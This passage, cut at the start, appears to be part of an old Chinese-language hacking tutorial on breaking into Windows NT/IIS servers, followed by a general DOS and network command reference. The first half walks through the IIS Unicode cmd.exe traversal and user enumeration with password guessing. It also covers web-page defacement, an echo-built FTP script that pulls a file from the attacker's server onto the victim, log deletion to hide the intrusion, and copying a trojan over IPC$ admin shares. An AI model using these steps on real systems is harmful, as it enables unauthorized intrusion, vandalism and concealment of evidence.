DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3,GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。
7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大写哦。
这个我认为大不大写没有太大差别,用处还是一样的。
之后用net use \\对方IP 连接一下!
net view \\对方IP 查看对方共享文件夹
net use X: \\IP\对方共享文件 映\*对方共享文件夹成为本机的X盘
这就是139端口的基本用法!不过前提是必须对方开共享!
netstat -n看看谁连接你
-----------------
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered
Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 <03> 的话,那他前面的就是用户.
这里的用户是PENTIUMII。
没有03说明:MAC没和IP捆在一起了
8:Shutdown
关了对方的NT服务器的命令
Shutdown \\IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
Telnet进去用命令或者是本地用什么软件重启对方电脑
shutdown -m \\计算机名称 可以远程重起或关闭的
9:DIR
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。
你可以本地试下。
10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件 以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
记得要 del c:\cnhack.txt
11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读
----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。
第6章
1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
2.为什么我连不上IPC$?
答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是:net use \目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 :很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 :ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 :你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 :你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 :原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 :目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 :目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
第7章
DOS 常用命令:
dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改日期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘
不常用DOS命令
diskcomp磁盘比较  append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速器
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理
常用命令具体介绍:
一、Dir
显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符
*.后缀
指定要查看后缀的文件。上面其实也可以为“ .后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
/w
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls
清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”
四、Exit
退出当前命令解释程序并返回到系统。
五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
七、md
创建目录或子目录
八、Move
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba
十三、Set
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户,这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录,包括子目录。
/s
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
/e
复制所有子目录,包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。
网络常用命令:
网络常用命令:
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如:
C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改"地址解析协议 (ARP)"缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在"计划"服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
语法
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]
at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command]
参数
\\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
ID
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
/yes
删除已计划的事件时,对来自系统的所有询问都回答"是"。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
date
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
/next:
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
/?
在命令提示符显示帮助。
注释
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅"相关主题"。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员。
加载 Cmd.exe
在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe:
cmd /c dir > c:\test.out。
查看已计划的命令
当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中:
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
包含标识号 (ID)
当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中:
Task ID:1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在"命令行"列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。查看结果
使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (>)。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入:
at 14:45 c:\test.bat ^>c:\output.txt
执行命令的当前目录为 systemroot 文件夹。
更改系统时间
在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。
存储命令
已计划的命令存储在注册表中。这样,如果重新启动"计划"服务,则不会丢失计划任务。
连接到网络驱动器
对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。"计划"服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如:
at 1:00pm my_backup \\server\share
请不要使用下述语法(其中 x: ?表示由用户建立的连接):
at 1:00pm my_backup x:
如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。
范例
要显示 Marketing 服务器上已计划的命令列表,请键入:
at \\marketing
要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入:
at \\corp 3
要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入:
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt"
为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入:
at \\marketing 00:00 /every:5,10,15,20,25,30 archive
要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息:
at /delete
如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe:
cmd /c dir > c:\test.out。
14.Rsh
在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。
语法
rsh [Host] [-l UserName] [-n] [Command]
参数
Host
指定运行 command 的远程计算机。
-l UserName
指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。
-n
将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。
Command
指定要运行的命令。
/?
在命令提示符显示帮助。
注释
标准操作
rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件"RemoteFile"附加到本地文件"LocalFile"中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
15.Tftp
向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。
语法
tftp [-i] [Host] [{get | put}] [Source] [Destination]
参数
-i
指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。
Host
指定本地或远程计算机。
put
将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。
get
将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。
Source
指定要传送的文件。
Destination
指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。
/?
在命令提示符显示帮助。
注释
使用 get 参数
如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。
Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入:
tftp vax1 put users.txt users19.txt
16.Nbtstat
